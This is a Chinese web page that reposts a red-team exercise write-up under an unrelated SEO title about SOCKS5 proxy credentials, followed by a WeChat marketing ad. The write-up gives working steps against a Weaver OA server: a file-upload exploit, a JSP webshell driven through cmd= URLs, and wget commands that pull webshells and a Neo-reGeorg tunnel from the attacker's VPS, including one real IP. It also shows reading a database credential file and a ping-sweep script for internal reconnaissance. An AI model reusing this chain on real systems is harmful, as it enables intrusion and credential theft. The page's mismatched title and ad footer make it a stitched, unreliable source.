socks5代理ip賬號密碼,socks5代理用戶名密碼?

記某次攻防演練實戰(zhàn)

0x01 信息收集 前期進行相關(guān)的信息收集工作,發(fā)現(xiàn)主站的防護很嚴格,爆破被鎖,批量測試工具會被ban ip,難度很大心態(tài)有點崩。

子域名枚舉,訪問后發(fā)現(xiàn)是一個業(yè)務(wù)系統(tǒng),IP定位是某海外IP。原來該公司有海外業(yè)務(wù),終于找到了一個相對的邊緣資產(chǎn)。訪問該系統(tǒng)的網(wǎng)站主頁,對登錄框進行測試: 抓登錄包進行測試,隨便輸入賬號密碼之后提示License提交頁面:測試文件上傳功能點:發(fā)現(xiàn)cookie頭中包含ecology_JSession字段名,驗證該指紋是泛微OA應用。

0x02 web打點 用泛微OA的EXP進行測試相關(guān)漏洞:

測試出泛微OA weaver.common.Ctrl任意文件上傳漏洞,上傳了一句話jsp。

手工測試該一句話jsp:http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=whoami發(fā)現(xiàn)可以進行命令執(zhí)行,目標系統(tǒng)為linux

判斷目標機器是否出網(wǎng):目標機器嘗試ping 我的VPS:VPS上監(jiān)聽80端口,目標機器嘗試與80端口通信。發(fā)現(xiàn)目標機器可以與我的VPS通信。

0x03 建立據(jù)點

1、嘗試使用webshell管理目標: 生成冰蝎的jsp webshell,嘗試將冰蝎馬落到目標機器上。http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=ping X.X.X.X -c 4http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wgethttp://X.X.X.X

(1) 確定網(wǎng)站的絕對路徑: 絕對路徑為:/data/bdip/weaver/ecology/

(2) VSP啟臨時web服務(wù)發(fā)布webshell,目標機器執(zhí)行下載命令: 確認冰蝎馬落到目標機器的網(wǎng)站絕對路徑下

。http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=pwdhttp://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wget -P /data/bdip/weaver/ecology/ http://X.X.X.X/x.jsp使用冰蝎連接對應的webshell,連接成功:

2、使用http_tunnel管理目標

(1) 使用Neo-reGeorg工具生成http tunnel的jsp: python3 neoreg.py generate -k xxxx

(2) 下載tunnel.jsp馬到目標機器上: 確認tunnel.jsp文件落到目標機器根目錄上。

(3) 在VPS上連接http tunnel jsp: http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wget -P /data/bdip/weaver/ecology http://149.28.22.33/xx.jsppython3 neoreg.py -u http://X.X.X.X/tunnel.jsp -k xxx -p 1001

(4) 通過proxychains代理工具測試驗證訪問目標內(nèi)網(wǎng):

0x04 當前落腳點機器信息收集

1、尋找泛微OA連接數(shù)據(jù)庫配置文件:

2、查看連接數(shù)據(jù)庫的配置文件: 發(fā)現(xiàn)是MSSQL數(shù)據(jù)庫,且數(shù)據(jù)庫服務(wù)在本地開啟。

3、查看數(shù)據(jù)庫中的數(shù)據(jù): 拿到sa用戶的密碼使用冰蝎去連接數(shù)據(jù)庫,可以看到對應庫中的數(shù)據(jù):

http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=ls -lrth /data/bdip/weaver/ecology/WEB-INF/prop/weaver.propertieshttp://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=cat /data/bdip/weaver/ecology/WEB-INF/prop/weaver.properties

0x05 內(nèi)網(wǎng)信息收集 1、查看當前機器的IP及同網(wǎng)段的主機IP:

2、探測當前網(wǎng)段存活主機:由于socks5代理無法代理ping流量。因此在VPS上準備一個ping.sh腳本,臨時開啟http服務(wù)。#!/bin/bashfor i in {1..254} do

ping -c2 -i0.3 -W1 X.X.X.$i &>/dev/null

if [ $? -eq 0 ];then

echo "X.X.X.$i is up" else

echo "X.X.X.$i is down"

fidone目標機器主動將ping.sh腳本下載到/opt目錄下:

給ping.sh腳本賦予可執(zhí)行權(quán)限:

運行ping.sh腳本將探活結(jié)果寫到文件里:查看掃描結(jié)果除了落腳點這臺機器,竟然當前網(wǎng)段只有1臺機器存活。

存活機器大概率是網(wǎng)關(guān),沒有其他可以橫向移動的機器了。

查了下hosts文件發(fā)現(xiàn)是云某云主機,結(jié)束


首發(fā)tools by geo

好了,這篇文章的內(nèi)容發(fā)貨聯(lián)盟就和大家分享到這里,如果大家網(wǎng)絡(luò)推廣引流創(chuàng)業(yè)感興趣,可以添加微信:80709525  備注:發(fā)貨聯(lián)盟引流學習; 我拉你進直播課程學習群,每周135晚上都是有實戰(zhàn)干貨的推廣引流技術(shù)課程免費分享!


版權(quán)聲明:本文內(nèi)容由互聯(lián)網(wǎng)用戶自發(fā)貢獻,該文觀點僅代表作者本人。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔相關(guān)法律責任。如發(fā)現(xiàn)本站有涉嫌抄襲侵權(quán)/違法違規(guī)的內(nèi)容, 請發(fā)送郵件至 sumchina520@foxmail.com 舉報,一經(jīng)查實,本站將立刻刪除。

您可能還會喜歡:

發(fā)表評論

◎歡迎參與討論,請在這里發(fā)表您的看法、交流您的觀點。